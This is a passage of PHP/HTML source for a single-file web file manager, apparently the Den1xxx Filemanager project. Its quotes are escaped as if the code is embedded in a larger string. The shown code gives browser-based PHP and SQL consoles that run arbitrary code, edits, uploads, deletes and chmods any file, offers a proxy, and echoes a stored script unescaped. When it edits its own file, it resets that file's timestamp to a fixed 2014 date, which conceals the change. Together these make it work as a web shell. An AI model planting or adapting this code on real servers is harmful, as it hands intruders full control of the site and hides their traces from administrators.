}
.all tbody td:first-child{width:100%;}
textarea {
font: 9pt \'Courier New\', courier;
line-height: 125%;
padding: 5px;
}
.textarea_input {
height: 1em;
}
.textarea_input:focus {
height: auto;
}
input[type=submit]{
background: #FCFCFC none !important;
cursor: pointer;
}
.folder {
background-image: url(\"\");
}
.file {
background-image: url(\"\");
}
<?=fm_home_style()?>
.img {
background-image:
url(\"\");
}
@media screen and (max-width:720px){
table{display:block;}
#fm_table td{display:inline;float:left;}
#fm_table tbody td:first-child{width:100%;padding:0;}
#fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
#fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
#fm_table tr{display:block;float:left;clear:left;width:100%;}
#header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
#header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php
$url_inc = \'?fm=true\';
if (isset($_POST[\'sqlrun\'])&&!empty($fm_config[\'enable_sql_console\'])){
$res = empty($_POST[\'sql\']) ? \'\' : $_POST[\'sql\'];
$res_lng = \'sql\';
} elseif (isset($_POST[\'phprun\'])&&!empty($fm_config[\'enable_php_console\'])){
$res = empty($_POST[\'php\']) ? \'\' : $_POST[\'php\'];
$res_lng = \'php\';
}
if (isset($_GET[\'fm_settings\'])) {
echo \'
<table class=\"whole\">
<form method=\"post\" action=\"\">
<tr><th colspan=\"2\">\'.__(\'File manager\').\' - \'.__(\'Settings\').\'</th></tr>
\'.(empty($msg)?\'\':\'<tr><td class=\"row2\" colspan=\"2\">\'.$msg.\'</td></tr>\').\'
\'.fm_config_checkbox_row(__(\'Show size of the folder\'),\'show_dir_size\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'pictures\'),\'show_img\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'Make directory\'),\'make_directory\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'New file\'),\'new_file\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'Upload\'),\'upload_file\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' PHP version\',\'show_php_ver\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' PHP ini\',\'show_php_ini\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'Generation time\'),\'show_gt\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' xls\',\'show_xls\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' PHP \'.__(\'Console\'),\'enable_php_console\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' SQL \'.__(\'Console\'),\'enable_sql_console\').\'
<tr><td class=\"row1\"><input name=\"fm_config[sql_server]\" value=\"\'.$fm_config[\'sql_server\'].\'\" type=\"text\"></td><td class=\"row2 whole\">SQL server</td></tr>
<tr><td class=\"row1\"><input name=\"fm_config[sql_username]\" value=\"\'.$fm_config[\'sql_username\'].\'\" type=\"text\"></td><td class=\"row2 whole\">SQL user</td></tr>
<tr><td class=\"row1\"><input name=\"fm_config[sql_password]\" value=\"\'.$fm_config[\'sql_password\'].\'\" type=\"text\"></td><td class=\"row2 whole\">SQL password</td></tr>
<tr><td class=\"row1\"><input name=\"fm_config[sql_db]\" value=\"\'.$fm_config[\'sql_db\'].\'\" type=\"text\"></td><td class=\"row2 whole\">SQL DB</td></tr>
\'.fm_config_checkbox_row(__(\'Show\').\' Proxy\',\'enable_proxy\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' phpinfo()\',\'show_phpinfo\').\'
\'.fm_config_checkbox_row(__(\'Show\').\' \'.__(\'Settings\'),\'fm_settings\').\'
\'.fm_config_checkbox_row(__(\'Restore file time after editing\'),\'restore_time\').\'
\'.fm_config_checkbox_row(__(\'File manager\').\': \'.__(\'Restore file time after editing\'),\'fm_restore_time\').\'
<tr><td class=\"row3\"><a href=\"\'.fm_url().\'?fm_settings=true&fm_config_delete=true\">\'.__(\'Reset settings\').\'</a></td><td class=\"row3\"><input type=\"submit\" value=\"\'.__(\'Save\').\'\" name=\"fm_config[fm_set_submit]\"></td></tr>
</form>
</table>
<table>
<form method=\"post\" action=\"\">
<tr><th colspan=\"2\">\'.__(\'Settings\').\' - \'.__(\'Authorization\').\'</th></tr>
<tr><td class=\"row1\"><input name=\"fm_login[authorize]\" value=\"1\" \'.($auth[\'authorize\']?\'checked\':\'\').\' type=\"checkbox\" id=\"auth\"></td><td class=\"row2 whole\"><label for=\"auth\">\'.__(\'Authorization\').\'</label></td></tr>
<tr><td class=\"row1\"><input name=\"fm_login[login]\" value=\"\'.$auth[\'login\'].\'\" type=\"text\"></td><td class=\"row2 whole\">\'.__(\'Login\').\'</td></tr>
<tr><td class=\"row1\"><input name=\"fm_login[password]\" value=\"\'.$auth[\'password\'].\'\" type=\"text\"></td><td class=\"row2 whole\">\'.__(\'Password\').\'</td></tr>
<tr><td class=\"row1\"><input name=\"fm_login[cookie_name]\" value=\"\'.$auth[\'cookie_name\'].\'\" type=\"text\"></td><td class=\"row2 whole\">\'.__(\'Cookie\').\'</td></tr>
<tr><td class=\"row1\"><input name=\"fm_login[days_authorization]\" value=\"\'.$auth[\'days_authorization\'].\'\" type=\"text\"></td><td class=\"row2 whole\">\'.__(\'Days\').\'</td></tr>
<tr><td class=\"row1\"><textarea name=\"fm_login[script]\" cols=\"35\" rows=\"7\" class=\"textarea_input\" id=\"auth_script\">\'.$auth[\'script\'].\'</textarea></td><td class=\"row2 whole\">\'.__(\'Script\').\'</td></tr>
<tr><td colspan=\"2\" class=\"row3\"><input type=\"submit\" value=\"\'.__(\'Save\').\'\" ></td></tr>
</form>
</table>\';
echo fm_tpl_form(\'php\'),fm_tpl_form(\'sql\');
} elseif (isset($proxy_form)) {
die($proxy_form);
} elseif (isset($res_lng)) {
?>
<table class=\"whole\">
<tr>
<th><?=__(\'File manager\').\' - \'.$path?></th>
</tr>
<tr>
<td class=\"row2\"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__(\'Console\')?><?php
if($res_lng==\'sql\') echo \' - Database: \'.$fm_config[\'sql_db\'].\'</h2></td><td>\'.fm_run_input(\'php\');
else echo \'</h2></td><td>\'.fm_run_input(\'sql\');
?></td></tr></table></td>
</tr>
<tr>
<td class=\"row1\">
<a href=\"<?=$url_inc.\'&path=\' . $path;?>\"><?=__(\'Back\')?></a>
<form action=\"\" method=\"POST\" name=\"console\">
<textarea name=\"<?=$res_lng?>\" cols=\"80\" rows=\"10\" style=\"width: 90%\"><?=$res?></textarea><br/>
<input type=\"reset\" value=\"<?=__(\'Reset\')?>\">
<input type=\"submit\" value=\"<?=__(\'Submit\')?>\" name=\"<?=$res_lng?>run\">
<?php
$str_tmpl = $res_lng.\'_templates\';
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : \'\';
if (!empty($tmpl)){
$active = isset($_POST[$res_lng.\'_tpl\']) ? $_POST[$res_lng.\'_tpl\'] : \'\';
$select = \'<select name=\"\'.$res_lng.\'_tpl\" title=\"\'.__(\'Template\').\'\" onchange=\"if (this.value!=-1) document.forms[\\\'console\\\'].elements[\\\'\'.$res_lng.\'\\\'].value = this.options[selectedIndex].value; else document.forms[\\\'console\\\'].elements[\\\'\'.$res_lng.\'\\\'].value =\\\'\\\';\" >\'.\"\\n\";
$select .= \'<option value=\"-1\">\' . __(\'Select\') . \"</option>\\n\";
foreach ($tmpl as $key=>$value){
$select.=\'<option value=\"\'.$value.\'\" \'.((!empty($value)&&($value==$active))?\'selected\':\'\').\' >\'.__($key).\"</option>\\n\";
}
$select .= \"</select>\\n\";
echo $select;
}
?>
</form>
</td>
</tr>
</table>
<?php
if (!empty($res)) {
$fun=\'fm_\'.$res_lng;
echo \'<h3>\'.strtoupper($res_lng).\' \'.__(\'Result\').\'</h3><pre>\'.$fun($res).\'</pre>\';
}
} elseif (!empty($_REQUEST[\'edit\'])){
if(!empty($_REQUEST[\'save\'])) {
$fn = $path . $_REQUEST[\'edit\'];
$filemtime = filemtime($fn);
if (file_put_contents($fn, $_REQUEST[\'newcontent\'])) $msg .= __(\'File updated\');
else $msg .= __(\'Error occurred\');
if ($_GET[\'edit\']==basename(__FILE__)) {
touch(__FILE__,1415116371);
} else {
if (!empty($fm_config[\'restore_time\'])) touch($fn,$filemtime);
}
}
$oldcontent = @file_get_contents($path . $_REQUEST[\'edit\']);
$editlink = $url_inc . \'&edit=\' . $_REQUEST[\'edit\'] . \'&path=\' . $path;
$backlink = $url_inc . \'&path=\' . $path;
?>
<script src=\"https://cdn.jsdelivr.net/gh/Den1xxx/EditArea@master/edit_area/edit_area_full.js\"></script>
<table border=\'0\' cellspacing=\'0\' cellpadding=\'1\' width=\"100%\">
<tr>
<th><?=__(\'File manager\').\' - \'.__(\'Edit\').\' - \'.$path.$_REQUEST[\'edit\']?></th>
</tr>
<tr>
<td class=\"row1\">
<?=$msg?>
</td>
</tr>
<tr>
<td class=\"row1\">
<?=fm_home()?> <a href=\"<?=$backlink?>\"><?=__(\'Back\')?></a>
</td>
</tr>
<tr>
<td class=\"row1\" align=\"center\">
<form name=\"form1\" method=\"post\" action=\"<?=$editlink?>\">
<textarea name=\"newcontent\" id=\"newcontent\" cols=\"45\" rows=\"25\" style=\"width:99%\" spellcheck=\"false\"><?=htmlspecialchars($oldcontent)?></textarea>
<input type=\"submit\" name=\"save\" value=\"<?=__(\'Submit\')?>\">
<input type=\"submit\" name=\"cancel\" value=\"<?=__(\'Cancel\')?>\">
</form>
</td>
</tr>
</table>
<script language=\"Javascript\" type=\"text/javascript\">
document.addEventListener(\'DOMContentLoaded\', function() {
editAreaLoader.init({
id: \"newcontent\"
,display: \"later\"
,start_highlight: true
,allow_resize: \"both\"
,allow_toggle: true
,word_wrap: true
,language: \"ru\"
,syntax: \"<?=pathinfo($_REQUEST[\'edit\'], PATHINFO_EXTENSION)?>\"
,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"
,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"
});
});
</script>
<?php
echo $auth[\'script\'];
} elseif(!empty($_REQUEST[\'rights\'])){
if(!empty($_REQUEST[\'save\'])) {
if(fm_chmod($path . $_REQUEST[\'rights\'], fm_convert_rights($_REQUEST[\'rights_val\']), @$_REQUEST[\'recursively\']))
$msg .= (__(\'File updated\'));
else $msg .= (__(\'Error occurred\'));
}
clearstatcache();
$oldrights = fm_rights_string($path . $_REQUEST[\'rights\'], true);
$link = $url_inc . \'&rights=\' . $_REQUEST[\'rights\'] . \'&path=\' . $path;
$backlink = $url_inc . \'&path=\' . $path;
?>
<table class=\"whole\">
<tr>
<th><?=__(\'File manager\').\' - \'.$path?></th>
</tr>
<tr>
<td class=\"row1\">
<?=$msg?>
</td>
</tr>
<tr>
<td class=\"row1\">
<a href=\"<?=$backlink?>\"><?=__(\'Back\')?></a>
</td>
</tr>
<tr>
<td class=\"row1\" align=\"center\">
<form name=\"form1\" method=\"post\" action=\"<?=$link?>\">
<?=__(\'Rights\').\' - \'.$_REQUEST[\'rights\']?> <input type=\"text\" name=\"rights_val\" value=\"<?=$oldrights?>\">
<?php if (is_dir($path.$_REQUEST[\'rights\'])) { ?>
<input type=\"checkbox\" name=\"recursively\" value=\"1\"> <?=__(\'Recursively\')?><br/>
<?php } ?>
<input type=\"submit\" name=\"save\" value=\"<?=__(\'Submit\')?>\">
</form>
</td>
</tr>
</table>
<?php
} elseif (!empty($_REQUEST[\'rename\'])&&$_REQUEST[\'rename\']<>\'.\') {
if(!empty($_REQUEST[\'save\'])) {
rename($path . $_REQUEST[\'rename\'], $path . $_REQUEST[\'newname\']);
$msg .= (__(\'File updated\'));
$_REQUEST[\'rename\'] = $_REQUEST[\'newname\'];
}
clearstatcache();
$link = $url_inc . \'&rename=\' . $_REQUEST[\'rename\'] . \'&path=\' . $path;
$backlink = $url_inc . \'&path=\' . $path;
?>
<table class=\"whole\">
<tr>
<th><?=__(\'File manager\').\' - \'.$path?></th>
</tr>
<tr>
<td class=\"row1\">
<?=$msg?>
</td>
</tr>
<tr>
<td class=\"row1\">
<a href=\"<?=$backlink?>\"><?=__(\'Back\')?></a>
</td>
</tr>
<tr>
<td class=\"row1\" align=\"center\">
<form name=\"form1\" method=\"post\" action=\"<?=$link?>\">
<?=__(\'Rename\')?>: <input type=\"text\" name=\"newname\" value=\"<?=$_REQUEST[\'rename\']?>\"><br/>
<input type=\"submit\" name=\"save\" value=\"<?=__(\'Submit\')?>\">
</form>
</td>
</tr>
</table>
<?php
} else {
//Let\'s rock!
$msg = \'\';
if(!empty($_FILES[\'upload\'])&&!empty($fm_config[\'upload_file\'])) {
if(!empty($_FILES[\'upload\'][\'name\'])){
$_FILES[\'upload\'][\'name\'] = str_replace(\'%\', \'\', $_FILES[\'upload\'][\'name\']);
if(!move_uploaded_file($_FILES[\'upload\'][\'tmp_name\'], $path . $_FILES[\'upload\'][\'name\'])){
$msg .= __(\'Error occurred\');
} else {
$msg .= __(\'Files uploaded\').\': \'.$_FILES[\'upload\'][\'name\'];
}
}
} elseif(!empty($_REQUEST[\'delete\'])&&$_REQUEST[\'delete\']<>\'.\') {
if(!fm_del_files(($path . $_REQUEST[\'delete\']), true)) {
$msg .= __(\'Error occurred\');
} else {
$msg .= __(\'Deleted\').\' \'.$_REQUEST[\'delete\'];
}
} elseif(!empty($_REQUEST[\'mkdir\'])&&!empty($fm_config[\'make_directory\'])) {
if(!@mkdir($path . $_REQUEST[\'dirname\'],0777)) {
$msg .= __(\'Error occurred\');
} else {
$msg .= __(\'Created\').\' \'.$_REQUEST[\'dirname\'];
}
} elseif(!empty($_POST[\'search_recursive\'])) {
ini_set(\'max_execution_time\', \'0\');
$search_data = find_text_in_files($_POST[\'path\'], $_POST[\'mask\'], $_POST[\'search_recursive\']);
if(!empty($search_data)) {
$msg .= __(\'Found in files\').\' (\'.count($search_data).\'):<br>\';
foreach ($search_data as $filename) {
$msg .= \'<a href=\"\'.fm_url(true).\'?fm=true&edit=\'.basename($filename).\'&path=\'.str_replace(\'/\'.basename($filename),\'/\',$filename).\'\" title=\"\' . __(\'Edit\') . \'\">\'.basename($filename).\'</a> \';
}
} else {
$msg .= __(\'Nothing founded\');
}
} elseif(!empty($_REQUEST[\'mkfile\'])&&!empty($fm_config[\'new_file\'])) {
if(!$fp=@fopen($path . $_REQUEST[\'filename\'],\"w\")) {
$msg .= __(\'Error occurred\');
} else {
fclose($fp);
$msg .= __(\'Created\').\' \'.$_REQUEST[\'filename\'];
}
} elseif (isset($_GET[\'zip\'])) {
$source = base64_decode($_GET[\'zip\']);
$destination = basename($source).\'.zip\';
set_time_limit(0);
$phar = new PharData($destination);
$phar->buildFromDirectory($source);
if (is_file($destination))
$msg .= __(\'Task\').\' \"\'.__(\'Archiving\').\' \'.$destination.\'\" \'.__(\'done\').
\'. \'.fm_link(\'download\',$path.$destination,__(\'Download\'),__(\'Download\').\' \'. $destination)
.\' <a href=\"\'.$url_inc.\'&delete=\'.$destination.\'&path=\' . $path.\'\" title=\"\'.__(\'Delete\').\' \'. $destination.\'\" >\'.__(\'Delete\') . \'</a>\';
else $msg .= __(\'Error occurred\').\': \'.__(\'no files\');
} elseif (isset($_GET[\'gz\'])) {
$source = base64_decode($_GET[\'gz\']);
$archive = $source.\'.tar\';
$destination = basename($source).\'.tar\';
if (is_file($archive)) unlink($archive);
if (is_file($archive.\'.gz\')) unlink($archive.\'.gz\');
clearstatcache();
set_time_limit(0);
//die();
$phar = new PharData($destination);
$phar->buildFromDirectory($source);
$phar->compress(Phar::GZ,\'.tar.gz\');
unset($phar);
if (is_file($archive)) {
if (is_file($archive.\'.gz\')) {
unlink($archive);
$destination .= \'.gz\';
}
$msg .= __(\'Task\').\' \"\'.__(\'Archiving\').\' \'.$destination.\'\" \'.__(\'done\').
\'. \'.fm_link(\'download\',$path.$destination,__(\'Download\'),__(\'Download\').\' \'. $destination)
.\' <a href=\"\'.$url_inc.\'&delete=\'.$destination.\'&path=\' . $path.\'\" title=\"\'.__(\'Delete\').\' \'.$destination.\'\" >\'.__(\'Delete\').\'</a>\';
} else $msg .= __(\'Error occurred\').\': \'.__(\'no files\');
} elseif (isset($_GET[\'decompress\'])) {
// $source = base64_decode($_GET[\'decompress\']);
// $destination = basename($source);
// $ext = end(explode(\".\", $destination));
// if ($ext==\'zip\' OR $ext==\'gz\') {
// $phar = new PharData($source);
// $phar->decompress();
// $base_file = str_replace(\'.\'.$ext,\'\',$destination);
// $ext = end(explode(\".\", $base_file));
// if ($ext==\'tar\'){
// $phar = new PharData($base_file);
// $phar->extractTo(dir($source));
// }
// }
// $msg .= __(\'Task\').\' \"\'.__(\'Decompress\').\' \'.$source.\'\" \'.__(\'done\');
} elseif (isset($_GET[\'gzfile\'])) {
$source = base64_decode($_GET[\'gzfile\']);
$archive = $source.\'.tar\';
$destination = basename($source).\'.tar\';
if (is_file($archive)) unlink($archive);
if (is_file($archive.\'.gz\')) unlink($archive.\'.gz\');
set_time_limit(0);
//echo $destination;
$ext_arr = explode(\'.\',basename($source));
if (isset($ext_arr[1])) {
unset($ext_arr[0]);
$ext=implode(\'.\',$ext_arr);
}
$phar = new PharData($destination);
$phar->addFile($source);
$phar->compress(Phar::GZ,$ext.\'.tar.gz\');
unset($phar);
if (is_file($archive)) {
if (is_file($archive.\'.gz\')) {
unlink($archive);
$destination .= \'.gz\';
}
$msg .= __(\'Task\').\' \"\'.__(\'Archiving\').\' \'.$destination.\'\" \'.__(\'done\').
\'. \'.fm_link(\'download\',$path.$destination,__(\'Download\'),__(\'Download\').\' \'. $destination)
.\' <a href=\"\'.$url_inc.\'&delete=\'.$destination.\'&path=\' . $path.\'\" title=\"\'.__(\'Delete\').\' \'.$destination.\'\" >\'.__(\'Delete\').\'</a>\';
} else $msg .= __(\'Error occurred\').\': \'.__(\'no files\');
}
?>
<table class=\"whole\" id=\"header_table\" >
<tr>
<th colspan=\"2\"><?=__(\'File manager\')?><?=(!empty($path)?\' - \'.$path:\'\')?></th>
</tr>
<?php if(!empty($msg)){ ?>
<tr>
<td colspan=\"2\" class=\"row2\"><?=$msg?></td>
</tr>
<?php } ?>
<tr>
<td class=\"row2\">
<table>
<tr>
<td>
<?=fm_home()?>
</td>
<td>
<?php if(!empty($fm_config[\'make_directory\'])) { ?>
<form method=\"post\" action=\"<?=$url_inc?>\">
<input type=\"hidden\" name=\"path\" value=\"<?=$path?>\" />
<input type=\"text\" name=\"dirname\" size=\"15\">
<input type=\"submit\" name=\"mkdir\" value=\"<?=__(\'Make directory\')?>\">
</form>
<?php } ?>
</td>
<td>
<?php if(!empty($fm_config[\'new_file\'])) { ?>
<form method=\"post\" action=\"<?=$url_inc?>\">
<input type=\"hidden\" name=\"path\" value=\"<?=$path?>\" />
<input type=\"text\" name=\"filename\" size=\"15\">
<input type=\"submit\" name=\"mkfile\" value=\"<?=__(\'New file\')?>\">
</form>
<?php } ?>
</td>
<td>
<form method=\"post\" action=\"<?=$url_inc?>\" style=\"display:inline\">
<input type=\"hidden\" name=\"path\" value=\"<?=$path?>\" />
<input type=\"text\" placeholder=\"<?=__(\'Recursive search\')?>\" name=\"search_recursive\" value=\"<?=!empty($_POST[\'search_recursive\'])?$_POST[\'search_recursive\']:\'\'?>\" size=\"15\">
<input type=\"text\" name=\"mask\" placeholder=\"<?=__(\'Mask\')?>\" value=\"<?=!empty($_POST[\'mask\'])?$_POST[\'mask\']:\'*.*\'?>\" size=\"5\">
<input type=\"submit\" name=\"search\" value=\"<?=__(\'Search\')?>\">
</form>
</td>
<td>
<?=fm_run_input(\'php\')?>
</td>
<td>
<?=fm_run_input(\'sql\')?>
</td>
</tr>
</table>
</td>
<td class=\"row3\">
<table>
<tr>
<td>
<?php if (!empty($fm_config[\'upload_file\'])) { ?>
<form name=\"form1\" method=\"post\" action=\"<?=$url_inc?>\" enctype=\"multipart/form-data\">
<input type=\"hidden\" name=\"path\" value=\"<?=$path?>\" />
<input type=\"file\" name=\"upload\" id=\"upload_hidden\" style=\"position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;\" onchange=\"document.getElementById(\'upload_visible\').value = this.value;\" />
<input type=\"text\" readonly=\"1\" id=\"upload_visible\" placeholder=\"<?=__(\'Select the file\')?>\" style=\"cursor: pointer;\" onclick=\"document.getElementById(\'upload_hidden\').click();\" />
<input type=\"submit\" name=\"test\" value=\"<?=__(\'Upload\')?>\" />
</form>
<?php } ?>
</td>
<td>
<?php if ($auth[\'authorize\']) { ?>
<form action=\"\" method=\"post\">
<input name=\"quit\" type=\"hidden\" value=\"1\">
<?=__(\'Hello\')?>, <?=$auth[\'login\']?>
<input type=\"submit\" value=\"<?=__(\'Quit\')?>\">
</form>
<?php } ?>
</td>
<td>
<?=fm_lang_form($language)?>
</td>
<tr>
</table>
</td>
</tr>
</table>
<table class=\"all\" border=\'0\' cellspacing=\'1\' cellpadding=\'1\' id=\"fm_table\" width=\"100%\">
<thead>
<tr>
<th style=\"white-space:nowrap\"> <?=__(\'Filename\')?> </th>
<th style=\"white-space:nowrap\"> <?=__(\'Size\')?> </th>
<th style=\"white-space:nowrap\"> <?=__(\'Date\')?> </th>
<th style=\"white-space:nowrap\"> <?=__(\'Rights\')?> </th>
<th colspan=\"4\" style=\"white-space:nowrap\"> <?=__(\'Manage\')?> </th>
</tr>
</thead>
<tbody>
<?php
$elements = fm_scan_dir($path, \'\', \'all\', true);
$dirs = array();
$files = array();
foreach ($elements as $file){
if(@is_dir($path . $file)){
$dirs[] = $file;
} else {
$files[] = $file;
}
}
natsort($dirs); natsort($files);
$elements = array_merge($dirs, $files);
foreach ($elements as $file){
$filename = $path . $file;
$filedata = @stat($filename);
if(@is_dir($filename)){
$filedata[7] = \'\';
if (!empty($fm_config[\'show_dir_size\'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
$link = \'<a href=\"\'.$url_inc.\'&path=\'.$path.$file.\'\" title=\"\'.__(\'Show\').\' \'.$file.\'\"><span class=\"folder\"> </span> \'.$file.\'</a>\';
$loadlink= (fm_root($file)||$phar_maybe) ? \'\' : fm_link(\'zip\',$filename,__(\'Compress\').\' zip\',__(\'Archiving\').\' \'. $file);
$arlink = (fm_root($file)||$phar_maybe) ? \'\' : fm_link(\'gz\',$filename,__(\'Compress\').\' .tar.gz\',__(\'Archiving\').\' \'.$file);
$style = \'row2\';
if (!fm_root($file)) $alert = \'onClick=\"if(confirm(\\\'\' . __(\'Are you sure you want to delete this directory (recursively)?\').\'\\n /\'. $file. \'\\\')) document.location.href = \\\'\' . $url_inc . \'&delete=\' . $file . \'&path=\' . $path . \'\\\'\"\'; else $alert = \'\';
} else {
$link =
$fm_config[\'show_img\']&&@getimagesize($filename)
? \'<a target=\"_blank\" onclick=\"var lefto = screen.availWidth/2-320;window.open(\\\'\'
. fm_img_link($filename)
.\'\\\',\\\'popup\\\',\\\'width=640,height=480,left=\\\' + lefto + \\\',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\\\');return false;\" href=\"\'.fm_img_link($filename).\'\"><span class=\"img\"> </span> \'.$file.\'</a>\'
: \'<a href=\"\' . $url_inc . \'&edit=\' . $file . \'&path=\' . $path. \'\" title=\"\' . __(\'Edit\') . \'\"><span class=\"file\"> </span> \'.$file.\'</a>\';
$e_arr = explode(\".\", $file);
$ext = end($e_arr);
$loadlink = fm_link(\'download\',$filename,__(\'Download\'),__(\'Download\').\' \'. $file);
$arlink = in_array($ext,array(\'zip\',\'gz\',\'tar\'))
? \'\'
: ((fm_root($file)||$phar_maybe) ? \'\' : fm_link(\'gzfile\',$filename,__(\'Compress\').\' .tar.gz\',__(\'Archiving\').\' \'. $file));
$style = \'row1\';
$alert = \'onClick=\"if(confirm(\\\'\'. __(\'File selected\').\': \\n\'. $file. \'. \\n\'.__(\'Are you sure you want to delete this file?\') . \'\\\')) document.location.href = \\\'\' . $url_inc . \'&delete=\' . $file . \'&path=\' . $path . \'\\\'\"\';
}
$deletelink = fm_root($file) ? \'\' : \'<a href=\"#\" title=\"\' . __(\'Delete\') . \' \'. $file . \'\" \' . $alert . \'>\' . __(\'Delete\') . \'</a>\';
$renamelink = fm_root($file) ? \'\' : \'<a href=\"\' . $url_inc . \'&rename=\' . $file . \'&path=\' . $path . \'\" title=\"\' . __(\'Rename\') .\' \'. $file . \'\">\' . __(\'Rename\') . \'</a>\';
$rightstext = ($file==\'.\' || $file==\'..\') ? \'\' : \'<a href=\"\' . $url_inc . \'&rights=\' . $file . \'&path=\' . $path . \'\" title=\"\' . __(\'Rights\') .\' \'. $file . \'\">\' . @fm_rights_string($filename) . \'</a>\';
?>
<tr class=\"<?=$style?>\">
<td><?=$link?></td>
<td><?=$filedata[7]?></td>
<td style=\"white-space:nowrap\"><?=gmdate(\"Y-m-d H:i:s\",$filedata[9])?></td>
<td><?=$rightstext?></td>
<td><?=$deletelink?></td>
<td><?=$renamelink?></td>
<td><?=$loadlink?></td>
<td><?=$arlink?></td>
</tr>
<?php
}
}
?>
</tbody>
</table>
<div class=\"row3\"><?php
$mtime = explode(\' \', microtime());
$totaltime = $mtime[0] + $mtime[1] - $starttime;
echo fm_home().\' | ver. \'.$fm_version.\' | <a href=\"https://github.com/Den1xxx/Filemanager\">Github</a> | <a href=\"\'.fm_site_url().\'\">.</a>\';
if (!empty($fm_config[\'show_php_ver\'])) echo \' | PHP \'.phpversion();
if (!empty($fm_config[\'show_php_ini\'])) echo \' | \'.php_ini_loaded_file();
if (!empty($fm_config[\'show_gt\'])) echo \' | \'.__(\'Generation time\').\': \'.round($totaltime,2);
if (!empty($fm_config[\'enable_proxy\'])) echo \' | <a href=\"?proxy=true\">proxy</a>\';
if (!empty($fm_config[\'show_phpinfo\'])) echo \' | <a href=\"?phpinfo=true\">phpinfo</a>\';
if (!empty($fm_config[\'show_xls\'])&&!empty($link)) echo \' | <a href=\"javascript: void(0)\" onclick=\"var obj = new table2Excel(); obj.CreateExcelSheet(\\\'fm_table\\\',\\\'export\\\');\" title=\"\'.__(\'Download\').\' xls\">xls</a>\';
if (!empty($fm_config[\'fm_settings\'])) echo \' | <a href=\"?fm_settings=true\">\'.__(\'Settings\').\'</a>\';
?>
</div>
<script type=\"text/javascript\">
function download_xls(filename, text) {
var element = document.createElement(\'a\');
element.setAttribute(\'href\', \'data:application/vnd.ms-excel;base64,\' + text);
element.setAttribute(\'download\', filename);
element.style.display = \'none\';
document.body.appendChild(element);
element.click();
document.body.removeChild(element);
}
function base64_encode(m) {
for (var k = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\".split(\"\"), c, d, h, e, a, g = \"\", b = 0, f, l = 0; l < m.length; ++l) {
c = m.charCodeAt(l);
if (128 > c) d = 1;
else
for (d = 2; c >= 2 << 5 * d;) ++d;
for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
}
b && (g += k[f << 6 - b]);
return g
}
var tableToExcelData = (function() {
var uri = \'data:application/vnd.ms-excel;base64,\',
template = \'<html xmlns:o=\"urn:schemas-microsoft-com:office:office\" xmlns:x=\"urn:schemas-microsoft-com:office:excel\" xmlns=\"http://www.w3.org/TR/REC-html40\"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv=\"content-type\" content=\"text/plain; charset=UTF-8\"/></head><body><table>{table}</table></body></html>\',
format = function(s, c) {
return s.replace(/{(\\w+)}/g, function(m, p) {
return c[p];
})
}
return function(table, name) {
if (!table.nodeType) table = document.getElementById(table)
var ctx = {
worksheet: name || \'Worksheet\',
table: table.innerHTML.replace(/<span(.*?)\\/span> /g,\"\").replace(/<a\\b[^>]*>(.*?)<\\/a>/g,\"$1\")
}
t = new Date();
filename = \'fm_\' + t.toISOString() + \'.xls\'
download_xls(filename, base64_encode(format(template, ctx)))
}
})();
var table2Excel = function () {
var ua = window.navigator.userAgent;
var msie = ua.indexOf(\"MSIE \");
this.CreateExcelSheet =
function(el, name){
if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\\:11\\./)) {// If Internet Explorer
var x = document.getElementById(el).rows;
var xls = new ActiveXObject(\"Excel.Application\");
xls.visible = true;
xls.Workbooks.Add
for (i = 0; i < x.length; i++) {
var y = x[i].cells;
for (j = 0; j < y.length; j++) {
xls.Cells(i + 1, j + 1).Value = y[j].innerText;
}
}
xls.Visible = true;
xls.UserControl = true;
return xls;
} else {
tableToExcelData(el, name);
}
}
}
</script>
</body>
</html>
<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
var $archive_name = \'\';
var $tmp_file = 0;
var $file_pos = 0;
var $isGzipped = true;
var $errors = array();
var $files = array();
function __construct(){
if (!isset($this->errors)) $this->errors = array();
}
function createArchive($file_list){
$result = false;
if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false;
else $newArchive = true;
if ($newArchive){
if (!$this->openWrite()) return false;
} else {
if (filesize($this->archive_name) == 0) return $this->openWrite();
if ($this->isGzipped) {
